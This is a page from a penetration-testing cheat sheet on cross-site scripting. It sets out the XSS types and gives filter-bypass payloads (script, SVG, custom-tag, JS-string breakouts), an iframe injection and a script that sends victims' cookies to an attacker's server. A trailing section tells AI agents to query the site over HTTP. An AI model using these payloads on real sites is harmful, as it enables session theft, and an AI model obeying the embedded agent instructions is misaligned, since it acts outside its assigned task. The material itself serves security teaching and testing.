# Cross site scripting (XSS)

> Cross-site scripting is a type of computer security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Cross-site_scripting)

* [XSS Filter Evasion Cheat Sheet - OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
* [PayloadsAllTheThings/XSS Injection at master · swisskyrepo/PayloadsAllTheThings · GitHub](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)
* [GitHub - mandatoryprogrammer/xsshunter: The XSS Hunter service - a portable version of XSSHunter.com](https://github.com/mandatoryprogrammer/xsshunter)
* [PortSwigger Cheat Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
* [XSSMap](https://github.com/Jewel591/xssmap)

## Types of XSS

### Reflected (non-persistent)

> Javascript code sent in a request, e.g. via query parameters or form data, is reflected in the response.

E.g.:

```
https://domain.com/?error=<script>alert(1)</script>
```

To exploit victims you need an external delivery mechanism, like email, a tweet or other message.

### Stored (persistent)

> Javascript code gets stored on the server and displayed in an unsafe way to other users.

Entry points:

* URL query string
* Message body
* Request headers
* Any out-of-band routes

Exit points:

* All possible HTTP responses

-> Try to find links between entry and exit points.

E.g.:\
Use `<script>alert(1)</script>` as username, in a comment post, etc.

Via img: `<img src="." onerror="alert('test');" />`\
Via url: `<a href="javascript:alert('test')>test</a>`

As your payload is stored on the server, you don't an external delivery mechanism (as for reflected XSS), therefore stored XSS is generally considered a more severe vulnerability.

### DOM-based (client-side code)

> Attacker gets control over Javascript variables that are written to the DOM or used in methods like `eval()` or `innerHTML`.

#### HTML sinks

Place random alphanumeric strings into the source (e.g. `location.search`) and inspect the DOM using a browsers developer tools.

#### JS sinks

Using the browsers developer tools you can inspect and follow your input through the JavaScript code and check if/how it is sent to a sink.

See also [PortSwigger - Web Security Academy - Which sinks can lead to DOM-XSS vulnerabilities?](https://portswigger.net/web-security/cross-site-scripting/dom-based#which-sinks-can-lead-to-dom-xss-vulnerabilities).

**jQuery**

Sinks:

* `attr()`
* `$()`

**AngularJS**

Check for `ng-app` attribute, then use `{{...}}` to inject JavaScript.

### Blind

> Similar to "Stored", but you won't see the output/impact directly.\
> E.g.

* Submitting a contact form containing XSS

## Bypass WAF

### Tags and events

Use "Copy tags to clipboard" and "Copy events to clipboard" from [PortSwigger - XSS Cheat Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) to detect unfiltered tags and events (e.g. using Burp Intruder).

### Custom tag

Trigger XSS using custom html tags.

```html
<bla id=blub onfocus=alert(1) tabindex=1>#blub
```

### SVG tag

Using animation and `onbegin` event:

```html
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect><animateTransform onbegin="alert(1)" /></rect></svg>
```

Using svg `animate` tag to set the `href` attribute for `a`nchor tag:

```html
<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me!</text></a></svg>
```

### Break out JS string

E.g. using:

```javascript
'-alert(1)-'
';alert(1)//'
```

### HTML encoding

Single quote, get's decoded first and then executed when used in event handlers like `onclick`.

```html
&apos;
```

### Template literals

Templates literals are encapsulated in backticks and `${...}` syntax can be used to evaluate JavaScipt inside them.

```javascript
document.getElementById('message').innerText = `user controllable data`; // inject e.g. ${alert(1)}
```

## Polyglots

[Xss JaVaSCRipt PoLYglOTs](https://dev.to/caffiendkitten/xss-javascript-polyglots-4i64)

## Iframe injection

```html
<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>
```

## Stealing cookies & sessions

Let the user request an image from your server and send his cookie as a GET param.

```javascript
<script>
new Image().src="https://<your-server>?cookie="+document.cookie;
</script> 
```

## BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.\
[BeEF - The Browser Exploitation Framework Project](https://github.com/beefproject/beef)

Start `./beef`\
Username: beef\
Password: beef


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/web/cross-site-scripting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.